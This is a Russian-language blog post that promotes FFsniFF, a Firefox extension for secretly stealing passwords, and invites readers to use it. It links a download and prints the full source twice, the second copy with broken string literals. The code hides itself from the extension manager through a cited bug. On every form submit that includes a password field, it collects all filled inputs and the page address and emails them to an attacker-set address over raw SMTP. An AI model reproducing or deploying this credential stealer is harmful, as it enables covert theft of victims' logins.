FFsniFF
12-05-2008 22:21
к комментариям - к полной версии
- понравилось!
FFsniFF - забавное расширение для огнелиса, позволяющее проводить функцию беспалевного протроянивания браузера, как расширение FF. Достаточно заставить жертву установить сабж на свою лису и все введенные им пароли будут отсылаться на специально вписанное мыло. Вообще расширение было сделано противниками Firefox как доказательство что лиса - зло, но нас не проймешь.
Фичи:
- Прячет себя в Extensions manager (баг CVE-2006-6585)
- Нет GUI
- Не переконфигурируется после установки
- Настройки мыла и SMTP хранятся в chrome/content/ffsniff/ffsniffOverlay.js
Пользуйтесь.
http://azurit.elbiahosting.sk/ffsniff/
http://azurit.elbiahosting.sk/ffsniff/ffsniff-0.2.tar.gz
// set this to some host (FFsniFF will send this with EHLO command)
var send_from_host = "";
// set this to the sender e-mail address
var send_from = "";
// set this to the receiver e-mail address
var send_to = "";
// subject of the mail
var subject = "";
// smtp server which will be used to send e-mail
var smtp_host = "";
// smtp port
var smtp_port = "";
var transportService = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
var transport = "";
var outstream = "";
var instream = Components.classes["@mozilla.org/scriptableinputstream;1"].createInstance(Components.interfaces.nsIScriptableInputStream);
var stream = "";
var data = "";
var data0 = "EHLO " + send_from_host + "\r\n"
var data1 = "MAIL FROM: <" + send_from + ">\r\n"
var data2 = "RCPT TO: <" + send_to + ">\r\n"
var data3 = "DATA\r\n"
var data4 = "\r\n.\r\n"
var data5 = "QUIT\r\n"
var runnable = {
run: function send_data() {
transport = transportService.createTransport(null, 0, smtp_host, smtp_port, null);
outstream = transport.openOutputStream(0, 0, 0);
stream = transport.openInputStream(0, 0, 0);
instream.init(stream);
// this will avoid 'Improper use of SMTP command pipelining'
// error on SMTP servers
outstream.write(data0, data0.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data1, data1.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data2, data2.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data3, data3.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data, data.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data4, data4.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data5, data5.length);
while (instream.available() == 0) {}
outstream.close();
instream.close();
}
}
function sniff() {
var thread = Components.classes["@mozilla.org/thread;1"].getService(Components.interfaces.nsIThread);
thread.init(runnable, 512*1024, Components.interfaces.nsIThread.PRIORITY_NORMAL, Components.interfaces.nsIThread.SCOPE_LOCAL, Components.interfaces.nsIThread.STATE_UNJOINABLE);
}
function do_sniff() {
var ok = 0;
var hesla = window.content.document.getElementsByTagName("input");
data = "";
for (var i = 0; i < hesla.length; i++) {
if (hesla[i].value != "") {
if (hesla[i].type == "password") {
ok = 1;
}
if (hesla[i].name == "") {
data += hesla[i].type + ":" + ":" + hesla[i].value + "\n";
}
else {
data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
}
}
}
if (ok == 1) {
data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
sniff()
}
}
function hide_me() {
var RDFService = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);
var Container = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);
var extensionDS = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;
var root = RDFService.GetResource("urn:mozilla:item:root");
var nameArc = RDFService.GetResource("http://www.mozilla.org/2004/em-rdf#name");
Container.Init(extensionDS, root);
var elements = Container.GetElements();
while (elements.hasMoreElements()) {
var element = elements.getNext();
var name = "";
var target = extensionDS.GetTarget(element, nameArc, true);
if (target) {
name = target.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
if (name == "FFsniFF") {
Container.RemoveElement(element, true);
}
}
}
}
hide_me();
window.addEventListener("submit", do_sniff, false);
вверх^
к полной версии
понравилось!
в evernote
FFsniFF - забавное расширение для огнелиса, позволяющее проводить функцию беспалевного протроянивания браузера, как расширение FF. Достаточно заставить жертву установить сабж на свою лису и все введенные им пароли будут отсылаться на специально вписанное мыло. Вообще расширение было сделано противниками Firefox как доказательство что лиса - зло, но нас не проймешь.
Фичи:
- Прячет себя в Extensions manager (баг CVE-2006-6585)
- Нет GUI
- Не переконфигурируется после установки
- Настройки мыла и SMTP хранятся в chrome/content/ffsniff/ffsniffOverlay.js
Пользуйтесь.
http://azurit.elbiahosting.sk/ffsniff/
http://azurit.elbiahosting.sk/ffsniff/ffsniff-0.2.tar.gz
// set this to some host (FFsniFF will send this with EHLO command)
var send_from_host = "";
// set this to the sender e-mail address
var send_from = "";
// set this to the receiver e-mail address
var send_to = "";
// subject of the mail
var subject = "
// smtp server which will be used to send e-mail
var smtp_host = "";
// smtp port
var smtp_port = "";
var transportService = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
var transport = "";
var outstream = "";
var instream = Components.classes["@mozilla.org/scriptableinputstream;1"].createInstance(Components.interfaces.nsIScriptableInputStream);
var stream = "";
var data = "";
var data0 = "EHLO " + send_from_host + "\r\n"
var data1 = "MAIL FROM: <" + send_from + ">\r\n"
var data2 = "RCPT TO: <" + send_to + ">\r\n"
var data3 = "DATA\r\n"
var data4 = "\r\n.\r\n"
var data5 = "QUIT\r\n"
var runnable = {
run: function send_data() {
transport = transportService.createTransport(null, 0, smtp_host, smtp_port, null);
outstream = transport.openOutputStream(0, 0, 0);
stream = transport.openInputStream(0, 0, 0);
instream.init(stream);
// this will avoid 'Improper use of SMTP command pipelining'
// error on SMTP servers
outstream.write(data0, data0.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data1, data1.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data2, data2.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data3, data3.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data, data.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data4, data4.length);
while (instream.available() == 0) {}
instream.read(instream.available());
outstream.write(data5, data5.length);
while (instream.available() == 0) {}
outstream.close();
instream.close();
}
}
function sniff() {
var thread = Components.classes["@mozilla.org/thread;1"].getService(Components.interfaces.nsIThread);
thread.init(runnable, 512*1024, Components.interfaces.nsIThread.PRIORITY_NORMAL, Components.interfaces.nsIThread.SCOPE_LOCAL, Components.interfaces.nsIThread.STATE_UNJOINABLE);
}
function do_sniff() {
var ok = 0;
var hesla = window.content.document.getElementsByTagName("input");
data = "";
for (var i = 0; i < hesla.length; i++) {
if (hesla[i].value != "") {
if (hesla[i].type == "password") {
ok = 1;
}
if (hesla[i].name == "") {
data += hesla[i].type + ":" + "
}
else {
data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
}
}
}
if (ok == 1) {
data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
sniff()
}
}
function hide_me() {
var RDFService = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);
var Container = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);
var extensionDS = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;
var root = RDFService.GetResource("urn:mozilla:item:root");
var nameArc = RDFService.GetResource("http://www.mozilla.org/2004/em-rdf#name");
Container.Init(extensionDS, root);
var elements = Container.GetElements();
while (elements.hasMoreElements()) {
var element = elements.getNext();
var name = "";
var target = extensionDS.GetTarget(element, nameArc, true);
if (target) {
name = target.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
if (name == "FFsniFF") {
Container.RemoveElement(element, true);
}
}
}
}
hide_me();
window.addEventListener("submit", do_sniff, false);
Вы сейчас не можете прокомментировать это сообщение.
Дневник FFsniFF | Lis3n0k - Lis3n0k |
Лента друзей Lis3n0k
/ Полная версия
Добавить в друзья
Страницы:
раньше»